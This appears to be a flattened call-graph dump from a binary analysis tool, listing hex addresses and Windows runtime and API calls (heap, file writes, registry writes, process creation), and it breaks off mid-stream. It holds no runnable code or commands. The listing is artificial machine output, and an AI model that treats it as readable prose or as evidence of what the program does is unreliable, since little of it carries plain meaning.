9283 917714 9282->9283 9287 9179b6 ___sbh_free_block 9282->9287 9284 917900 VirtualFree 9283->9284 9283->9287 9285 917964 9284->9285 9286 917973 VirtualFree HeapFree 9285->9286 9285->9287 9286->9287 9287->9277 9291 9168f1 LeaveCriticalSection 9288->9291 9290 916416 9290->9281 9291->9290 9293 916914 __close 9292->9293 9294 91693a 9293->9294 9318 913b50 9293->9318 9300 91694a __close 9294->9300 9364 916468 9294->9364 9300->9235 9302 91696b 9304 9169cb __lock 66 API calls 9302->9304 9303 91695c 9306 912905 __close 66 API calls 9303->9306 9307 916972 9304->9307 9306->9300 9308 9169a6 9307->9308 9309 91697a 9307->9309 9311 9163b9 __crtLCMapStringA_stat 66 API calls 9308->9311 9310 916ecc __ioinit InitializeCriticalSectionAndSpinCount 9309->9310 9312 916985 9310->9312 9313 916997 9311->9313 9312->9313 9314 9163b9 __crtLCMapStringA_stat 66 API calls 9312->9314 9369 9169c2 9313->9369 9316 916991 9314->9316 9317 912905 __close 66 API calls 9316->9317 9317->9313 9372 91725d 9318->9372 9321 913b64 9323 9139a5 __NMSG_WRITE 66 API calls 9321->9323 9326 913b86 9321->9326 9322 91725d __set_error_mode 66 API calls 9322->9321 9324 913b7c 9323->9324 9325 9139a5 __NMSG_WRITE 66 API calls 9324->9325 9325->9326 9327 9139a5 9326->9327 9328 9139b9 9327->9328 9329 91725d __set_error_mode 63 API calls 9328->9329 9360 913b14 9328->9360 9330 9139db 9329->9330 9331 913b19 GetStdHandle 9330->9331 9333 91725d __set_error_mode 63 API calls 9330->9333 9332 913b27 _strlen 9331->9332 9331->9360 9336 913b40 WriteFile 9332->9336 9332->9360 9334 9139ec 9333->9334 9334->9331 9335 9139fe 9334->9335 9335->9360 9378 9171f5 9335->9378 9336->9360 9339 913a34 GetModuleFileNameA 9341 913a52 9339->9341 9348 913a75 _strlen 9339->9348 9343 9171f5 _strcpy_s 63 API calls 9341->9343 9344 913a62 9343->9344 9346 912775 __invoke_watson 10 API calls 9344->9346 9344->9348 9345 913ab8 9403 9170cc 9345->9403 9346->9348 9348->9345 9394 917140 9348->9394 9352 913adc 9354 9170cc _strcat_s 63 API calls 9352->9354 9353 912775 __invoke_watson 10 API calls 9353->9352 9356 913af0 9354->9356 9355 912775 __invoke_watson 10 API calls 9355->9345 9357 913b01 9356->9357 9358 912775 __invoke_watson 10 API calls 9356->9358 9412 916f63 9357->9412 9358->9357 9361 9136f1 9360->9361 9450 9136c6 GetModuleHandleW 9361->9450 9366 916471 9364->9366 9367 9164a7 9366->9367 9368 916488 Sleep 9366->9368 9454 919635 9366->9454 9367->9302 9367->9303 9368->9366 9483 9168f1 LeaveCriticalSection 9369->9483 9371 9169c9 9371->9300 9373 91726c 9372->9373 9374 913b57 9373->9374 9375 912905 __close 66 API calls 9373->9375 9374->9321 9374->9322 9376 91728f 9375->9376 9377 91289d __close 6 API calls 9376->9377 9377->9374 9379 917206 9378->9379 9380 91720d 9378->9380 9379->9380 9382 917233 9379->9382 9381 912905 __close 66 API calls 9380->9381 9386 917212 9381->9386 9384 913a20 9382->9384 9385 912905 __close 66 API calls 9382->9385 9383 91289d __close 6 API calls 9383->9384 9384->9339 9387 912775 9384->9387 9385->9386 9386->9383 9439 9157b0 9387->9439 9389 9127a2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9390 912872 __invoke_watson 9389->9390 9391 91287e GetCurrentProcess TerminateProcess 9389->9391 9390->9391 9441 91213c 9391->9441 9393 91289b 9393->9339 9395 917152 9394->9395 9397 913aa5 9395->9397 9399 917156 9395->9399 9401 91719c 9395->9401 9396 912905 __close 66 API calls 9398 917172 9396->9398 9397->9345 9397->9355 9400 91289d __close 6 API calls 9398->9400 9399->9396 9399->9397 9400->9397 9401->9397 9402 912905 __close 66 API calls 9401->9402 9402->9398 9404 9170e4 9403->9404 9406 9170dd 9403->9406 9405 912905 __close 66 API calls 9404->9405 9411 9170e9 9405->9411 9406->9404 9409 917118 9406->9409 9407 91289d __close 6 API calls 9408 913acb 9407->9408 9408->9352 9408->9353 9409->9408 9410 912905 __close 66 API calls 9409->9410 9410->9411 9411->9407 9413 91437f __init_pointers 6 API calls 9412->9413 9414 916f73 9413->9414 9415 91700e 9414->9415 9416 916f86 LoadLibraryA 9414->9416 9423 914388 __decode_pointer 6 API calls 9415->9423 9435 917038 9415->9435 9417 9170b0 9416->9417 9418 916f9b GetProcAddress 9416->9418 9417->9360 9418->9417 9420 916fb1 9418->9420 9419 917063 9421 914388 __decode_pointer 6 API calls 9419->9421 9424 91430d __encode_pointer 6 API calls 9420->9424 9421->9417 9422 914388 __decode_pointer 6 API calls 9432 91707b 9422->9432 9425 91702b 9423->9425 9426 916fb7 GetProcAddress 9424->9426 9427 914388 __decode_pointer 6 API calls 9425->9427 9428 91430d __encode_pointer 6 API calls 9426->9428 9427->9435 9429 916fcc GetProcAddress 9428->9429 9430 91430d __encode_pointer 6 API calls 9429->9430 9431 916fe1 GetProcAddress 9430->9431 9433 91430d __encode_pointer 6 API calls 9431->9433 9432->9419 9434 914388 __decode_pointer 6 API calls 9432->9434 9436 916ff6 9433->9436 9434->9419 9435->9419 9435->9422 9436->9415 9437 917000 GetProcAddress 9436->9437 9438 91430d __encode_pointer 6 API calls 9437->9438 9438->9415 9440 9157bc __VEC_memzero 9439->9440 9440->9389 9442 912144 9441->9442 9443 912146 IsDebuggerPresent 9441->9443 9442->9393 9449 914b62 9443->9449 9446 9125c9 SetUnhandledExceptionFilter UnhandledExceptionFilter 9447 9125e6 __invoke_watson 9446->9447 9448 9125ee GetCurrentProcess TerminateProcess 9446->9448 9447->9448 9448->9393 9449->9446 9451 9136da GetProcAddress 9450->9451 9452 9136ef ExitProcess 9450->9452 9451->9452 9453 9136ea 9451->9453 9453->9452 9455 9196e8 9454->9455 9461 919647 9454->9461 9456 916f3b _malloc 6 API calls 9455->9456 9457 9196ee 9456->9457 9458 912905 __close 65 API calls 9457->9458 9460 9196e0 9458->9460 9459 913b50 __FF_MSGBANNER 65 API calls 9459->9461 9460->9366 9461->9459 9461->9460 9463 9139a5 __NMSG_WRITE 65 API calls 9461->9463 9464 9196a4 HeapAlloc 9461->9464 9465 9136f1 _malloc 3 API calls 9461->9465 9466 9196d4 9461->9466 9467 916f3b _malloc 6 API calls 9461->9467 9469 9196d9 9461->9469 9471 9195e6 9461->9471 9463->9461 9464->9461 9465->9461 9468 912905 __close 65 API calls 9466->9468 9467->9461 9468->9469 9470 912905 __close 65 API calls 9469->9470 9470->9460 9472 9195f2 __close 9471->9472 9473 9169cb __lock 66 API calls 9472->9473 9475 919623 __close 9472->9475 9474 919608 9473->9474 9476 917e84 ___sbh_alloc_block 5 API calls 9474->9476 9475->9461 9477 919613 9476->9477 9479 91962c 9477->9479 9482 9168f1 LeaveCriticalSection 9479->9482 9481 919633 9481->9475 9482->9481 9483->9371 9485 917a32 HeapAlloc 9484->9485 9486 9179fe HeapReAlloc 9484->9486 9488 917a1c 9485->9488 9489 917a55 VirtualAlloc 9485->9489 9487 917a20 9486->9487 9486->9488 9487->9485 9488->9241 9489->9488 9490 917a6f HeapFree 9489->9490 9490->9488 9492 917ab2 VirtualAlloc 9491->9492 9494 917af9 9492->9494 9494->9240 9495->9246 9496->9174 9515 9168f1 LeaveCriticalSection 9497->9515 9499 91450b 9499->9184 9501 916074 InterlockedIncrement 9500->9501 9502 916077 9500->9502 9501->9502 9503 916081 InterlockedIncrement 9502->9503 9504 916084 9502->9504 9503->9504 9505 916091 9504->9505 9506 91608e InterlockedIncrement 9504->9506 9507 91609b InterlockedIncrement 9505->9507 9508 91609e 9505->9508 9506->9505 9507->9508 9509 9160b7 InterlockedIncrement 9508->9509 9510 9160c7 InterlockedIncrement 9508->9510 9511 9160d2 InterlockedIncrement 9508->9511 9509->9508 9510->9508 9511->9187 9516 9168f1 LeaveCriticalSection 9512->9516 9514 914559 9514->9189 9515->9499 9516->9514 9517->8943 9519 917358 9518->9519 9520 91737f __VEC_memcpy 9519->9520 9521 914062 9519->9521 9520->9519 9521->8962 9523 9172c0 9522->9523 9524 9172b9 9522->9524 9525 912905 __close 66 API calls 9523->9525 9524->9523 9526 9172ec 9524->9526 9530 9172c5 9525->9530 9528 9172d4 9526->9528 9529 912905 __close 66 API calls 9526->9529 9527 91289d __close 6 API calls 9527->9528 9528->8979 9529->9530 9530->9527 9532 91644d 9531->9532 9533 91430d __encode_pointer 6 API calls 9532->9533 9534 916465 9532->9534 9533->9532 9534->8987 9538 916ae9 9535->9538 9537 916b32 9537->8989 9539 916af5 __close 9538->9539 9546 913709 9539->9546 9545 916b16 __close 9545->9537 9547 9169cb __lock 66 API calls 9546->9547 9548 913710 9547->9548 9549 9169fe 9548->9549 9550 914388 __decode_pointer 6 API calls 9549->9550 9551 916a12 9550->9551 9552 914388 __decode_pointer 6 API calls 9551->9552 9553 916a22 9552->9553 9561 916aa5 9553->9561 9569 919da9 9553->9569 9555 916a40 9558 916a64 9555->9558 9565 916a8c 9555->9565 9582 9164f9 9555->9582 9556 91430d __encode_pointer 6 API calls 9557 916a9a 9556->9557 9559 91430d __encode_pointer 6 API calls 9557->9559 9558->9561 9562 9164f9 __realloc_crt 73 API calls 9558->9562 9563 916a7a 9558->9563 9559->9561 9566 916b1f 9561->9566 9562->9563 9563->9561 9564 91430d __encode_pointer 6 API calls 9563->9564 9564->9565 9565->9556 9632 913712 9566->9632 9570 919db5 __close 9569->9570 9571 919de2 9570->9571 9572 919dc5 9570->9572 9574 919e23 HeapSize 9571->9574 9576 9169cb __lock 66 API calls 9571->9576 9573 912905 __close 66 API calls 9572->9573 9575 919dca 9573->9575 9578 919dda __close 9574->9578 9577 91289d __close 6 API calls 9575->9577 9579 919df2 ___sbh_find_block 9576->9579 9577->9578 9578->9555 9587 919e43 9579->9587 9585 916502 9582->9585 9584 916541 9584->9558 9585->9584 9586 916522 Sleep 9585->9586 9591 91981d 9585->9591 9586->9585 9590 9168f1 LeaveCriticalSection 9587->9590 9589 919e1e 9589->9574 9589->9578 9590->9589 9592 919829 __close 9591->9592 9593 919830 9592->9593 9594 91983e 9592->9594 9595 919635 _malloc 66 API calls 9593->9595 9596 919851 9594->9596 9597 919845 9594->9597 9613 919838 __dosmaperr __close 9595->9613 9605 9199c3 9596->9605 9627 91985e ___sbh_resize_block ___sbh_find_block 9596->9627 9598 9163b9 __crtLCMapStringA_stat 66 API calls 9597->9598 9598->9613 9599 9199f6 9601 916f3b _malloc 6 API calls 9599->9601 9600 9199c8 HeapReAlloc 9600->9605 9600->9613 9603 9199fc 9601->9603 9602 9169cb __lock 66 API calls 9602->9627 9604 912905 __close 66 API calls 9603->9604 9604->9613 9605->9599 9605->9600 9606 919a1a 9605->9606 9607 916f3b _malloc 6 API calls 9605->9607 9609 919a10 9605->9609 9608 912905 __close 66 API calls 9606->9608 9606->9613 9607->9605 9610 919a23 GetLastError 9608->9610 9612 912905 __close 66 API calls 9609->9612 9610->9613 9615 919991 9612->9615 9613->9585 9614 9198e9 HeapAlloc 9614->9627 9615->9613 9617 919996 GetLastError 9615->9617 9616 91993e HeapReAlloc 9616->9627 9617->9613 9618 917e84 ___sbh_alloc_block 5 API calls 9618->9627 9619 9199a9 9619->9613 9621 912905 __close 66 API calls 9619->9621 9620 916f3b _malloc 6 API calls 9620->9627 9623 9199b6 9621->9623 9622 9176d5 VirtualFree VirtualFree HeapFree ___sbh_free_block 9622->9627 9623->9610 9623->9613 9624 91998c 9626 912905 __close 66 API calls 9624->9626 9625 917340 __VEC_memcpy _realloc 9625->9627 9626->9615 9627->9599 9627->9602 9627->9613 9627->9614 9627->9616 9627->9618 9627->9619 9627->9620 9627->9622 9627->9624 9627->9625 9628 919961 9627->9628 9631 9168f1 LeaveCriticalSection 9628->9631 9630 919968 9630->9627 9631->9630 9635 9168f1 LeaveCriticalSection 9632->9635 9634 913719 9634->9545 9635->9634 9637 911066 9636->9637 9638 911069 GetProcAddress GetProcAddress 9636->9638 9637->9638 9639 911094 9638->9639 9640 911096 GetProcAddress 9638->9640 9639->9640 9641 9110ac 9640->9641 9642 9110af GetProcAddress 9640->9642 9641->9642 9643 9110c5 9642->9643 9644 9110c8 GetProcAddress 9642->9644 9643->9644 9645 9110e1 GetProcAddress 9644->9645 9646 9110de 9644->9646 9647 9110f8 9645->9647 9648 9110fa GetProcAddress 9645->9648 9646->9645 9647->9648 9649 911111 9648->9649 9650 911113 GetProcAddress 9648->9650 9649->9650 9651 911129 9650->9651 9652 91112c LoadLibraryW 9650->9652 9651->9652 9653 91113c 9652->9653 9654 91113f GetProcAddress 9652->9654 9653->9654 9655 911155 9654->9655 9656 911158 GetProcAddress 9654->9656 9655->9656 9657 911171 GetProcAddress 9656->9657 9658 91116e 9656->9658 9659 911187 9657->9659 9660 91118a GetProcAddress GetProcAddress GetProcAddress GetModuleHandleW 9657->9660 9658->9657 9659->9660 9661 9111d6 9660->9661 9662 9111d9 GetProcAddress 9660->9662 9661->9662 9663 9111ef 9662->9663 9663->8994 9739 91232f 9664->9739 9668 911495 9667->9668 9669 9120f0 100 API calls 9668->9669 9670 9114af 9669->9670 9671 9120f0 100 API calls 9670->9671 9672 9114de 9671->9672 9673 9120f0 100 API calls 9672->9673 9675 911511 9673->9675 9674 911593 9679 9120f0 100 API calls 9674->9679 9675->9674 9676 91156e WriteFile 9675->9676 9677 911581 CloseHandle 9676->9677 9678 91157e 9676->9678 9677->9674 9681 911590 9677->9681 9678->9677 9680 911580 9678->9680 9683 9115b1 9679->9683 9680->9677 9681->9674 9682 91162e 9684 9120f0 100 API calls 9682->9684 9683->9682 9685 911609 WriteFile 9683->9685 9690 91164b 9684->9690 9686 91161a 9685->9686 9687 91161c CloseHandle 9685->9687 9686->9687 9687->9682 9688 91162b 9687->9688 9688->9682 9689 9116c9 9692 9120f0 100 API calls 9689->9692 9690->9689 9691 9116a3 WriteFile 9690->9691 9693 9116b3 9691->9693 9694 9116b5 CloseHandle 9691->9694 9698 9116e1 9692->9698 9693->9694 9694->9689 9696 9116c6 9694->9696 9696->9689 9697 911762 9699 91213c __crtLCMapStringA_stat 5 API calls 9697->9699 9698->9697 9701 91173d WriteFile 9698->9701 9700 911772 Sleep 9699->9700 9700->9056 9702 911750 CloseHandle 9701->9702 9703 91174d 9701->9703 9702->9697 9704 91175f 9702->9704 9703->9702 9705 91174f 9703->9705 9704->9697 9705->9702 9707 911278 9706->9707 9991 911200 9707->9991 9711 9112aa RegSetValueExW 9714 911304 RegCloseKey 9711->9714 9715 91131c 9714->9715 9715->9077 9718 911338 _memset 9716->9718 9717 91137c CreateProcessW 9719 9113a7 9717->9719 9718->9717 9720 9113c5 WaitForSingleObject GetExitCodeProcess 9719->9720 9723 9113b0 Sleep 9719->9723 9721 9113e4 9720->9721 9722 9113e7 CloseHandle 9720->9722 9721->9722 9724 9113e6 9721->9724 9725 9113f3 9722->9725 9726 9113f6 CloseHandle 9722->9726 9723->9090 9724->9722 9725->9726 9727 911402 9726->9727 9727->9723 9729 9121e4 9728->9729 9730 9121ec 9729->9730 9734 91220c 9729->9734 9731 912905 __close 66 API calls 9730->9731 9732 9121f1 9731->9732 9733 91289d __close 6 API calls 9732->9733 9735 912201 9733->9735 9734->9735 9736 912253 9734->9736 9737 912602 __flsbuf 100 API calls 9734->9737 9735->9100 9736->9735 9738 912602 __flsbuf 100 API calls 9736->9738 9737->9736 9738->9735 9742 9122a4 9739->9742 9743 9122b1 9742->9743 9745 9122ce 9742->9745 9744 912905 __close 66 API calls 9743->9744 9747 9122b6 9744->9747 9746 9122db 9745->9746 9748 9122e8 9745->9748 9749 912905 __close 66 API calls 9746->9749 9750 91289d __close 6 API calls 9747->9750 9757 9121ac 9748->9757 9751 9122e0 9749->9751 9755 91196b GetFileAttributesW 9750->9755 9754 91289d __close 6 API calls 9751->9754 9754->9755 9755->9003 9755->9108 9756 912905 __close 66 API calls 9756->9751 9758 9121dc 9757->9758 9759 9121bc 9757->9759 9762 9121ec 9758->9762 9768 91220c 9758->9768 9760 912905 __close 66 API calls 9759->9760 9761 9121c1 9760->9761 9763 91289d __close 6 API calls 9761->9763 9764 912905 __close 66 API calls 9762->9764 9770 9121d1 9763->9770 9765 9121f1 9764->9765 9766 91289d __close 6 API calls 9765->9766 9766->9770 9767 912253 9767->9770 9771 912602 __flsbuf 100 API calls 9767->9771 9768->9767 9768->9770 9772 912602 9768->9772 9770->9755 9770->9756 9771->9770 9793 915779 9772->9793 9775 912634 9778 912638 9775->9778 9779 912645 __flsbuf 9775->9779 9776 91261d 9777 912905 __close 66 API calls 9776->9777 9786 912622 9777->9786 9780 912905 __close 66 API calls 9778->9780 9779->9786 9789 91269b 9779->9789 9792 9126a6 9779->9792 9799 915560 9779->9799 9780->9786 9781 912735 9784 91543b __locking 100 API calls 9781->9784 9782 9126b5 9783 9126cc 9782->9783 9788 9126e9 9782->9788 9811 91543b 9783->9811 9784->9786 9786->9767 9788->9786 9836 914bef 9788->9836 9789->9792 9808 915517 9789->9808 9792->9781 9792->9782 9794 915788 9793->9794 9798 912612 9793->9798 9795 912905 __close 66 API calls 9794->9795 9796 91578d 9795->9796 9797 91289d __close 6 API calls 9796->9797 9797->9798 9798->9775 9798->9776 9800 91556d 9799->9800 9801 91557c 9799->9801 9802 912905 __close 66 API calls 9800->9802 9804 912905 __close 66 API calls 9801->9804 9805 9155a0 9801->9805 9803 915572 9802->9803 9803->9789 9806 915590 9804->9806 9805->9789 9807 91289d __close 6 API calls 9806->9807 9807->9805 9809 916468 __malloc_crt 66 API calls 9808->9809 9810 91552c 9809->9810 9810->9792 9812 915447 __close 9811->9812 9813 91546a 9812->9813 9814 91544f 9812->9814 9815 915478 9813->9815 9820 9154b9 9813->9820 9868 912918 9814->9868 9817 912918 __close 66 API calls 9815->9817 9819 91547d 9817->9819 9822 912905 __close 66 API calls 9819->9822 9871 9183bc 9820->9871 9821 912905 __close 66 API calls 9824 91545c __close 9821->9824 9825 915484 9822->9825 9824->9786 9827 91289d __close 6 API calls 9825->9827 9826 9154bf 9828 9154e2 9826->9828 9829 9154cc 9826->9829 9827->9824 9830 912905 __close 66 API calls 9828->9830 9881 914d08 9829->9881 9833 9154e7 9830->9833 9832 9154da 9940 91550d 9832->9940 9834 912918 __close 66 API calls 9833->9834 9834->9832 9837 914bfb __close 9836->9837 9838 914c28 9837->9838 9839 914c0c 9837->9839 9841 914c36 9838->9841 9843 914c57 9838->9843 9840 912918 __close 66 API calls 9839->9840 9842 914c11 9840->9842 9844 912918 __close 66 API calls 9841->9844 9847 912905 __close 66 API calls 9842->9847 9845 914c77 9843->9845 9846 914c9d 9843->9846 9848 914c3b 9844->9848 9850 912918 __close 66 API calls 9845->9850 9851 9183bc ___lock_fhandle 67 API calls 9846->9851 9862 914c19 __close 9847->9862 9849 912905 __close 66 API calls 9848->9849 9852 914c42 9849->9852 9853 914c7c 9850->9853 9854 914ca3 9851->9854 9855 91289d __close 6 API calls 9852->9855 9856 912905 __close 66 API calls 9853->9856 9857 914cb0 9854->9857 9858 914ccc 9854->9858 9855->9862 9861 914c83 9856->9861 9859 914b6a __lseeki64_nolock 68 API calls 9857->9859 9860 912905 __close 66 API calls 9858->9860 9863 914cc1 9859->9863 9864 914cd1 9860->9864 9865 91289d __close 6 API calls 9861->9865 9862->9786 9987 914cfe 9863->9987 9866 912918 __close 66 API calls 9864->9866 9865->9862 9866->9863 9869 91455b __getptd_noexit 66 API calls 9868->9869 9870 91291d 9869->9870 9870->9821 9872 9183c8 __close 9871->9872 9873 918423 9872->9873 9876 9169cb __lock 66 API calls 9872->9876 9874 918445 __close 9873->9874 9875 918428 EnterCriticalSection 9873->9875 9874->9826 9875->9874 9877 9183f4 9876->9877 9878 91840b 9877->9878 9879 916ecc __ioinit InitializeCriticalSectionAndSpinCount 9877->9879 9943 918453 9878->9943 9879->9878 9882 914d17 __write_nolock 9881->9882 9883 914d70 9882->9883 9884 914d49 9882->9884 9914 914d3e 9882->9914 9887 914dd8 9883->9887 9888 914db2 9883->9888 9886 912918 __close 66 API calls 9884->9886 9885 91213c __crtLCMapStringA_stat 5 API calls 9889 915439 9885->9889 9890 914d4e 9886->9890 9892 914dec 9887->9892 9947 914b6a 9887->9947 9891 912918 __close 66 API calls 9888->9891 9889->9832 9893 912905 __close 66 API calls 9890->9893 9894 914db7 9891->9894 9897 915560 __write_nolock 66 API calls 9892->9897 9896 914d55 9893->9896 9899 912905 __close 66 API calls 9894->9899 9900 91289d __close 6 API calls 9896->9900 9898 914df7 9897->9898 9901 91509d 9898->9901 9957 9145d4 9898->9957 9902 914dc0 9899->9902 9900->9914 9904 9150ad 9901->9904 9905 91536c WriteFile 9901->9905 9903 91289d __close 6 API calls 9902->9903 9903->9914 9907 91518b 9904->9907 9930 9150c1 9904->9930 9909 91507f 9905->9909 9910 91539f GetLastError 9905->9910 9928 91526b 9907->9928 9932 91519a 9907->9932 9911 9153ea 9909->9911 9909->9914 9916 9153bd 9909->9916 9910->9909 9911->9914 9915 912905 __close 66 API calls 9911->9915 9912 914e3d 9912->9901 9913 914e4f GetConsoleCP 9912->9913 9913->9909 9933 914e72 9913->9933 9914->9885 9918 91540d 9915->9918 9920 9153c8 9916->9920 9921 9153dc 9916->9921 9917 91512f WriteFile 9917->9910 9917->9930 9926 912918 __close 66 API calls 9918->9926 9919 9152d1 WideCharToMultiByte 9919->9910 9923 915308 WriteFile 9919->9923 9922 912905 __close 66 API calls 9920->9922 9965 91292b 9921->9965 9927 9153cd 9922->9927 9923->9928 9929 91533f GetLastError 9923->9929 9924 91520f WriteFile 9924->9910 9924->9932 9926->9914 9931 912918 __close 66 API calls 9927->9931 9928->9909 9928->9911 9928->9919 9928->9923 9929->9928 9930->9909 9930->9911 9930->9917 9931->9914 9932->9909 9932->9911 9932->9924 9933->9909 9933->9910 9935 918483 11 API calls __putwch_nolock 9933->9935 9936 914f1e WideCharToMultiByte 9933->9936 9937 916702 78 API calls __fassign 9933->9937 9939 914fa3 WriteFile 9933->9939 9962 916754 9933->9962 9935->9933 9936->9909 9938 914f4f WriteFile 9936->9938 9937->9933 9938->9910 9938->9933 9939->9910 9939->9933 9986 91845c LeaveCriticalSection 9940->9986 9942 915515 9942->9824 9946 9168f1 LeaveCriticalSection 9943->9946 9945 91845a 9945->9873 9946->9945 9970 918345 9947->9970 9949 914b88 9950 914ba1 SetFilePointer 9949->9950 9951 914b90 9949->9951 9952 914bb9 GetLastError 9950->9952 9955 914b95 9950->9955 9953 912905 __close 66 API calls 9951->9953 9954 914bc3 9952->9954 9952->9955 9953->9955 9956 91292b __dosmaperr 66 API calls 9954->9956 9955->9892 9956->9955 9958 91455b __getptd_noexit 66 API calls 9957->9958 9959 9145dc 9958->9959 9960 9145e9 GetConsoleMode 9959->9960 9961 91369d __amsg_exit 66 API calls 9959->9961 9960->9901 9960->9912 9961->9960 9983 91671c 9962->9983 9966 912918 __close 66 API calls 9965->9966 9967 912936 __dosmaperr 9966->9967 9968 912905 __close 66 API calls 9967->9968 9969 912949 9968->9969 9969->9914 9971 918352 9970->9971 9973 91836a 9970->9973 9972 912918 __close 66 API calls 9971->9972 9974 918357 9972->9974 9975 912918 __close 66 API calls 9973->9975 9978 9183af 9973->9978 9977 912905 __close 66 API calls 9974->9977 9976 918398 9975->9976 9979 912905 __close 66 API calls 9976->9979 9980 91835f 9977->9980 9978->9949 9981 91839f 9979->9981 9980->9949 9982 91289d __close 6 API calls 9981->9982 9982->9978 9984 91294e _LocaleUpdate::_LocaleUpdate 76 API calls 9983->9984 9985 91672f 9984->9985 9985->9933 9986->9942 9990 91845c LeaveCriticalSection 9987->9990 9989 914d06 9989->9862 9990->9989 9992 911208 9991->9992 9993 91120b RegOpenKeyExW 9991->9993 9992->9993 9994 911229 9993->9994 9995 911237 RegCreateKeyExW 9994->9995 9996 91125b RegOpenKeyExW 9994->9996 9995->9996 9996->9711 9998 9137ed __close 9997->9998 9999 9169cb __lock 66 API calls 9998->9999 10000 9137f4 9999->10000 10001 9138bd __initterm 10000->10001 10002 913820 10000->10002 10016 9138f8 10001->10016 10004 914388 __decode_pointer 6 API calls 10002->10004 10006 91382b 10004->10006 10007 9138ad __initterm 10006->10007 10009 914388 __decode_pointer 6 API calls 10006->10009 10007->10001 10015 913840 10009->10015 10010 9138ec 10011 9136f1 _malloc 3 API calls 10010->10011 10012 9138f5 __close 10011->10012 10012->9112 10013 914388 6 API calls __decode_pointer 10013->10015 10014 91437f 6 API calls __init_pointers 10014->10015 10015->10007 10015->10013 10015->10014 10017 9138d9 10016->10017 10018 9138fe 10016->10018 10017->10012 10020 9168f1 LeaveCriticalSection 10017->10020 10021 9168f1 LeaveCriticalSection 10018->10021 10020->10010 10021->10017 11871 91567b 11878 9187a4 11871->11878 11874 91568e 11876 9163b9 __crtLCMapStringA_stat 66 API calls 11874->11876 11877 915699 11876->11877 11891 9186ca 11878->11891 11880 915680 11880->11874 11881 91857b 11880->11881 11882 918587 __close 11881->11882 11883 9169cb __lock 66 API calls 11882->11883 11886 918593 11883->11886 11884 9185fc 11932 918611 11884->11932 11886->11884 11889 9185d1 DeleteCriticalSection 11886->11889 11919 91a522 11886->11919 11887 918608 __close 11887->11874 11890 9163b9 __crtLCMapStringA_stat 66 API calls 11889->11890 11890->11886 11892 9186d6 __close 11891->11892 11893 9169cb __lock 66 API calls 11892->11893 11900 9186e5 11893->11900 11894 91877d 11909 91879b 11894->11909 11897 918789 __close 11897->11880 11899 918682 104 API calls __fflush_nolock 11899->11900 11900->11894 11900->11899 11901 9156dc 11900->11901 11906 91876c 11900->11906 11902 9156e9 11901->11902 11903 9156ff EnterCriticalSection 11901->11903 11904 9169cb __lock 66 API calls 11902->11904 11903->11900 11905 9156f2 11904->11905 11905->11900 11912 91574a 11906->11912 11908 91877a 11908->11900 11918 9168f1 LeaveCriticalSection 11909->11918 11911 9187a2 11911->11897 11913 91575a 11912->11913 11914 91576d LeaveCriticalSection 11912->11914 11917 9168f1 LeaveCriticalSection 11913->11917 11914->11908 11916 91576a 11916->11908 11917->11916 11918->11911 11920 91a52e __close 11919->11920 11921 91a542 11920->11921 11922 91a55f 11920->11922 11923 912905 __close 66 API calls 11921->11923 11929 91a557 __close 11922->11929 11935 91569b 11922->11935 11924 91a547 11923->11924 11926 91289d __close 6 API calls 11924->11926 11926->11929 11929->11886 12028 9168f1 LeaveCriticalSection 11932->12028 11934 918618 11934->11887 11936 9156ad 11935->11936 11937 9156cf EnterCriticalSection 11935->11937 11936->11937 11938 9156b5 11936->11938 11939 9156c5 11937->11939 11940 9169cb __lock 66 API calls 11938->11940 11941 91a4ab 11939->11941 11940->11939 11942 91a4db 11941->11942 11943 91a4bf 11941->11943 11945 91a4d4 11942->11945 11960 91861a 11942->11960 11944 912905 __close 66 API calls 11943->11944 11946 91a4c4 11944->11946 11957 91a596 11945->11957 11948 91289d __close 6 API calls 11946->11948 11948->11945 11952 915779 __fileno 66 API calls 11953 91a4f5 11952->11953 11970 91aa16 11953->11970 11955 91a4fb 11955->11945 11956 9163b9 __crtLCMapStringA_stat 66 API calls 11955->11956 11956->11945 12021 91570e 11957->12021 11959 91a59c 11959->11929 11961 918633 11960->11961 11965 918655 11960->11965 11962 915779 __fileno 66 API calls 11961->11962 11961->11965 11963 91864e 11962->11963 11964 91543b __locking 100 API calls 11963->11964 11964->11965 11966 91aae3 11965->11966 11967 91aaf3 11966->11967 11969 91a4ef 11966->11969 11968 9163b9 __crtLCMapStringA_stat 66 API calls 11967->11968 11967->11969 11968->11969 11969->11952 11971 91aa22 __close 11970->11971 11972 91aa45 11971->11972 11973 91aa2a 11971->11973 11975 91aa53 11972->11975 11978 91aa94 11972->11978 11974 912918 __close 66 API calls 11973->11974 11976 91aa2f 11974->11976 11977 912918 __close 66 API calls 11975->11977 11979 912905 __close 66 API calls 11976->11979 11980 91aa58 11977->11980 11982 9183bc ___lock_fhandle 67 API calls 11978->11982 11983 91aa37 __close 11979->11983 11981 912905 __close 66 API calls 11980->11981 11984 91aa5f 11981->11984 11985 91aa9a 11982->11985 11983->11955 11986 91289d __close 6 API calls 11984->11986 11987 91aab5 11985->11987 11988 91aaa7 11985->11988 11986->11983 11990 912905 __close 66 API calls 11987->11990 11993 91a97a 11988->11993 11991 91aaaf 11990->11991 12008 91aad9 11991->12008 11994 918345 __lseeki64_nolock 66 API calls 11993->11994 11996 91a98a 11994->11996 11995 91a9e0 12011 9182bf 11995->12011 11996->11995 11998 91a9be 11996->11998 12001 918345 __lseeki64_nolock 66 API calls 11996->12001 11998->11995 11999 918345 __lseeki64_nolock 66 API calls 11998->11999 12003 91a9ca CloseHandle 11999->12003 12002 91a9b5 12001->12002 12005 918345 __lseeki64_nolock 66 API calls 12002->12005 12003->11995 12006 91a9d6 GetLastError 12003->12006 12004 91aa0a 12004->11991 12005->11998 12006->11995 12007 91292b __dosmaperr 66 API calls 12007->12004 12020 91845c LeaveCriticalSection 12008->12020 12010 91aae1 12010->11983 12012 9182d0 12011->12012 12013 91832b 12011->12013 12012->12013 12018 9182fb 12012->12018 12014 912905 __close 66 API calls 12013->12014 12015 918330 12014->12015 12016 912918 __close 66 API calls 12015->12016 12017 918321 12016->12017 12017->12004 12017->12007 12018->12017 12019 91831b SetStdHandle 12018->12019 12019->12017 12020->12010 12022 91571f 12021->12022 12023 91573e LeaveCriticalSection 12021->12023 12022->12023 12024 915726 12022->12024 12023->11959 12027 9168f1 LeaveCriticalSection 12024->12027 12026 91573b 12026->11959 12027->12026 12028->11934 10929 9145ee 10931 9145fa __close 10929->10931 10930 914612 10933 914620 10930->10933 10935 9163b9 __crtLCMapStringA_stat 66 API calls 10930->10935 10931->10930 10932 9163b9 